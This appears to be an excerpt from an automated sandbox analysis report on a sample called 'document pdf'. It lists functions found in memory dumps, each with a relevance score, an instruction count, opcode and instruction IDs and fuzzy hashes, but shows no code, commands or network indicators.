                                                                                                                        • Instruction Fuzzy Hash: 57D02B31D2022B53CB00E7A1FC004DFF738EEC1220B404222E91033000FB302658C6F0
                                                                                                                        Function 00F1D6D4 Relevance: .0, Instructions: 16COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7ad06603152cb62ca887fcf35ad2e0a638c0f0c7791504221db51ae0bd01aa55
                                                                                                                        • Instruction ID: 667278cd22b14ccb85ac58d060a57cd6f90695f7e22d02fca5733d4c0fb56b7d
                                                                                                                        • Opcode Fuzzy Hash: 7ad06603152cb62ca887fcf35ad2e0a638c0f0c7791504221db51ae0bd01aa55
                                                                                                                        • Instruction Fuzzy Hash: 81D01779E4000CCBCF30DFA8E5844DCFB70EF88321F20542AD926A3202C6341450CF41
                                                                                                                        Function 00F1AFAD Relevance: .0, Instructions: 16COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 31e3ccf8b681217e9a75d64b4fb4a60fb4b2b7ff79804124de417202774a08b6
                                                                                                                        • Instruction ID: 85758eb81ae3582f9a8695a88e5327657de9e2df36ef6be5b4ece0f24e5b1fd3
                                                                                                                        • Opcode Fuzzy Hash: 31e3ccf8b681217e9a75d64b4fb4a60fb4b2b7ff79804124de417202774a08b6
                                                                                                                        • Instruction Fuzzy Hash: E7D0677AB00108AFCB149F98E8809DDF7B6FB98221B048166E915A3264C6319925DB50
                                                                                                                        Function 00F16748 Relevance: .0, Instructions: 12COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b3c41b1135deaa922c7bd54db445626db66e8659f8a14edbd3f199d28f438458
                                                                                                                        • Instruction ID: 9badd4c7ba316c76972a79c6f3bf4b847ebd68a740870c217cfa47fb83816a2f
                                                                                                                        • Opcode Fuzzy Hash: b3c41b1135deaa922c7bd54db445626db66e8659f8a14edbd3f199d28f438458
                                                                                                                        • Instruction Fuzzy Hash: 25C080300007098BD509F775FCC56553B9EE7C0300F40B518A1051655DEFFC595A5790

                                                                                                                        Non-executed Functions

                                                                                                                        Function 06690040 Relevance: .6, Instructions: 596COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cbb16f86ffe556c01315560dbdcd41124de36d19a9c2e68fec8bdfe942e10b47
                                                                                                                        • Instruction ID: 564cafeaa48f159d69b183675f2c05edacb97a1b4892afbd541b4546341ee77a
                                                                                                                        • Opcode Fuzzy Hash: cbb16f86ffe556c01315560dbdcd41124de36d19a9c2e68fec8bdfe942e10b47
                                                                                                                        • Instruction Fuzzy Hash: 98527A74E01268CFDB64DF65C984B9DBBB2BB89300F1081EAD809A7255DB359EC6CF50
                                                                                                                        Function 00F1F961 Relevance: .3, Instructions: 276COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1b62c5488bca23c5c1449947d94594b13e2fdb8693e560f8bc3e2b317ca25324
                                                                                                                        • Instruction ID: b3003f5df1fbadb2874dfe28b2e952ef75611b1316615f20fa8750159aaec10e
                                                                                                                        • Opcode Fuzzy Hash: 1b62c5488bca23c5c1449947d94594b13e2fdb8693e560f8bc3e2b317ca25324
                                                                                                                        • Instruction Fuzzy Hash: F6C1CE74E01258CFDB54DFA5C984B9DBBB2FF89300F2081A9D809AB365DB359A85CF50
                                                                                                                        Function 0669E258 Relevance: .3, Instructions: 268COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 751cb8f382945e39296d832fb0c630bb27d7ad56249a7f14a47d44d832fabe4e
                                                                                                                        • Instruction ID: 24e2dadc74065d3d18ed485f53f8aa9e38e7419f5c4f9868c229d1885ea826ec
                                                                                                                        • Opcode Fuzzy Hash: 751cb8f382945e39296d832fb0c630bb27d7ad56249a7f14a47d44d832fabe4e
                                                                                                                        • Instruction Fuzzy Hash: 56C1AF74E01258CFEB54DFA5C984B9DBBB2FF89300F1081A9D809AB365DB359A85CF50
                                                                                                                        Function 0669DE00 Relevance: .3, Instructions: 268COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a9990918f243a3565dff1be9bb4f6cfcc66ff3051b9f94ba842071406955dcde
                                                                                                                        • Instruction ID: a1e91af6262c07ee68d2c768aa9197c9cb06345efacf951c118a6beccbc2209f
                                                                                                                        • Opcode Fuzzy Hash: a9990918f243a3565dff1be9bb4f6cfcc66ff3051b9f94ba842071406955dcde
                                                                                                                        • Instruction Fuzzy Hash: EBC1AF74E01258CFEB54DFA5C984B9DBBB2FF89300F1081A9D809AB365DB359A85CF50
                                                                                                                        Function 0669E6B0 Relevance: .3, Instructions: 268COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3149b602da5ce20c16d11568943a39ca7ccb9c888ad9e27dc343f437b29781f6
                                                                                                                        • Instruction ID: 051a7896d15c0433b5682d0b6c63f4e9e7e3a3dae740c82ce88eb31d201e563e
                                                                                                                        • Opcode Fuzzy Hash: 3149b602da5ce20c16d11568943a39ca7ccb9c888ad9e27dc343f437b29781f6
                                                                                                                        • Instruction Fuzzy Hash: 46C1A074E01258CFEB54DFA5C984B9DBBB2FF89300F1081A9D809AB365DB359A85CF50
                                                                                                                        Function 0669EF60 Relevance: .3, Instructions: 268COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4c04437fb1800d95470ddb31214d30a7f7b4738a2aa35e9f95daa8dab11407e3
                                                                                                                        • Instruction ID: 7bb7ce9c0305eda21e3e1f88f3488d49f4eb8c652764a631bf4e6fbfbae8e66f
                                                                                                                        • Opcode Fuzzy Hash: 4c04437fb1800d95470ddb31214d30a7f7b4738a2aa35e9f95daa8dab11407e3
                                                                                                                        • Instruction Fuzzy Hash: ECC1AF74E01218CFEB54DFA5C984B9DBBB2EF89300F1081A9D809AB355DB359A85CF50
                                                                                                                        Function 0669EB08 Relevance: .3, Instructions: 268COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d28e8f226eea9118e8e93f62281da135af54da7d7093c519efde3c3fc333e241
                                                                                                                        • Instruction ID: a11ff435eae61eb34319988479abc86ce9f8b9b64b4290b95a727e57bb8e455c
                                                                                                                        • Opcode Fuzzy Hash: d28e8f226eea9118e8e93f62281da135af54da7d7093c519efde3c3fc333e241
                                                                                                                        • Instruction Fuzzy Hash: 56C1AF74E01258CFEB54DFA5C984B9DBBB2FF89300F1081A9D809AB365DB359A85CF50
                                                                                                                        Function 0669F3B8 Relevance: .3, Instructions: 268COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0997783c6eca1a5571c1a38729f29d0b18330beadd56e4b8fd69026e0aaeb897
                                                                                                                        • Instruction ID: 76a0483013be9a7e1138f84da1cd6a2201c19b5c3e788c237f4f6a88d4041272
                                                                                                                        • Opcode Fuzzy Hash: 0997783c6eca1a5571c1a38729f29d0b18330beadd56e4b8fd69026e0aaeb897
                                                                                                                        • Instruction Fuzzy Hash: 2CC1A174E01258CFDB54DFA5C984B9DBBB2FF89300F1081A9D809AB365DB359A85CF50
                                                                                                                        Function 0669F810 Relevance: .3, Instructions: 268COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5eb3edce731a5afaeb24f502f4b4f915ec83cd245d9bb6ca3a4527bf462e0592
                                                                                                                        • Instruction ID: f19429940aad651333056e601a428f745b62f5336448d7c30f755e09b7e11ead
                                                                                                                        • Opcode Fuzzy Hash: 5eb3edce731a5afaeb24f502f4b4f915ec83cd245d9bb6ca3a4527bf462e0592
                                                                                                                        • Instruction Fuzzy Hash: A6C1A074E01258CFEB54DFA5C984B9DBBB2FF89300F1081A9D809AB365DB359A85CF50
                                                                                                                        Function 0669D0F8 Relevance: .3, Instructions: 268COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 556bb876667f5adf1d976260b1fcd41ad9d2d8067f05454a794799e51ec650d0
                                                                                                                        • Instruction ID: 7c69fd6b2e24700eaf47cad0d6e7a43d4353f3d94c58a8353b52b07f5f286c29
                                                                                                                        • Opcode Fuzzy Hash: 556bb876667f5adf1d976260b1fcd41ad9d2d8067f05454a794799e51ec650d0
                                                                                                                        • Instruction Fuzzy Hash: B6C1AF74E01258CFEB54DFA5C984B9DBBB2EF89300F1081A9D809AB365DB359E85CF50
                                                                                                                        Function 0669CCA0 Relevance: .3, Instructions: 268COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f76f736acf36469663ad287b6ba3d3d704bb0fa07aca17c587b9c563d031980f
                                                                                                                        • Instruction ID: 34ea65ebd4726f9980664f7ddc773b1cf5f089ade7bdb24c062312b07599e1cd
                                                                                                                        • Opcode Fuzzy Hash: f76f736acf36469663ad287b6ba3d3d704bb0fa07aca17c587b9c563d031980f
                                                                                                                        • Instruction Fuzzy Hash: 3AC1A074E01258CFEB54DFA5C984B9DBBB2FF89300F1081A9D809AB355DB359A85CF50
                                                                                                                        Function 0669D550 Relevance: .3, Instructions: 268COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3a362817b68fe8a45cbd63684149cc1a3012fc26739b51cb38493a32f3890c0a
                                                                                                                        • Instruction ID: 998a377459bfda395513af9c8ba29aa0b00e30057618adc53bc83a5791c0fd2f
                                                                                                                        • Opcode Fuzzy Hash: 3a362817b68fe8a45cbd63684149cc1a3012fc26739b51cb38493a32f3890c0a
                                                                                                                        • Instruction Fuzzy Hash: 56C1A074E01258CFEB54DFA5C994B9DBBB2FF89300F1081A9D809AB365DB355A81CF50
                                                                                                                        Function 0669D9A8 Relevance: .3, Instructions: 268COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3b420f4c05b33298fc8b2affe0c69822e83faac9d758e22e2774d4ceb3508db3
                                                                                                                        • Instruction ID: cdc0adddaa6da32e8fd267a11f96a5ca089df4b897d1d239262fbb5a6c97f168
                                                                                                                        • Opcode Fuzzy Hash: 3b420f4c05b33298fc8b2affe0c69822e83faac9d758e22e2774d4ceb3508db3
                                                                                                                        • Instruction Fuzzy Hash: 2BC1AF74E01258CFEB54DFA5C984B9DBBB2FF89300F1081A9D809AB365DB359A85CF50
                                                                                                                        Function 06690673 Relevance: .2, Instructions: 193COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 646015ca3cabe325b7be5ab1af3332a5ab88cfe7124a4f919ca1ea1b58809256
                                                                                                                        • Instruction ID: 97bbbbdf1a755655739f7dd16cb463e23158e41d1b0b46a20a229e797e401997
                                                                                                                        • Opcode Fuzzy Hash: 646015ca3cabe325b7be5ab1af3332a5ab88cfe7124a4f919ca1ea1b58809256
                                                                                                                        • Instruction Fuzzy Hash: D0A18D74A01268CFDB64DF24C994BDABBB2BB49300F5085EAD80AA7255DB359E81CF50
                                                                                                                        Function 00F1F2C0 Relevance: .2, Instructions: 150COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0f73d8f7600515a1a35bd154c146ff53c53a770b2f328a42b4b810e8d477edac
                                                                                                                        • Instruction ID: 9daed8f957d90f7aab3f3c65cf0706140f7251137cdbf62cbf912cc9ae4ff551
                                                                                                                        • Opcode Fuzzy Hash: 0f73d8f7600515a1a35bd154c146ff53c53a770b2f328a42b4b810e8d477edac
                                                                                                                        • Instruction Fuzzy Hash: C9513670D01258CFDB04EFA9D8947EEBBB2FF89310F248129D405AB2A9C7759886DF50
                                                                                                                        Function 00F1F4AC Relevance: .1, Instructions: 146COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1964dfec12e3eb54bde0e4f6b1ee3f994a5dfd742db8e456d37861650c525ecf
                                                                                                                        • Instruction ID: e8b380ed3d015748dc02030d7732e73075d37fe0f0b4bbf4c7453b420e091c97
                                                                                                                        • Opcode Fuzzy Hash: 1964dfec12e3eb54bde0e4f6b1ee3f994a5dfd742db8e456d37861650c525ecf
                                                                                                                        • Instruction Fuzzy Hash: B9510374D01218CFDB04EFA8D884BEEBBB2FF49310F258129D415AB295C7799886EF50
                                                                                                                        Function 06690853 Relevance: .1, Instructions: 116COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4671149910.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_6690000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e1357270414779e7a001886b1d8f4fb45c746467d6c0ad4ffa2c337aa7bf127e
                                                                                                                        • Instruction ID: eb3122d0e9aa7bc6dc0e8887c9479f34b5d96cdfb18d164e342d20804edfb583
                                                                                                                        • Opcode Fuzzy Hash: e1357270414779e7a001886b1d8f4fb45c746467d6c0ad4ffa2c337aa7bf127e
                                                                                                                        • Instruction Fuzzy Hash: FA519474A01228CFCB65DF24C894BA9B7B2FF49301F5095EAD40AA7350DB359E81CF50
                                                                                                                        Function 00F11A18 Relevance: 5.1, Strings: 4, Instructions: 119COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.4664433548.0000000000F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F10000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_f10000_document pdf.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: F$F$F$F
                                                                                                                        • API String ID: 0-1453486905
                                                                                                                        • Opcode ID: d4d1c7a2630fcbca278293cb8d4f1ec702b26f47a6cd6188e77d5eb219fd3983
                                                                                                                        • Instruction ID: 0fbe56a694623bea7b7c1b8e8d976e8e713e936efc859b81251e685b37f38aa7
                                                                                                                        • Opcode Fuzzy Hash: d4d1c7a2630fcbca278293cb8d4f1ec702b26f47a6cd6188e77d5eb219fd3983
                                                                                                                        • Instruction Fuzzy Hash: 83416E74A05249DFCB09EFB8C8516AEBBB2FF85300F1045ACD104AB395DB755E82DB91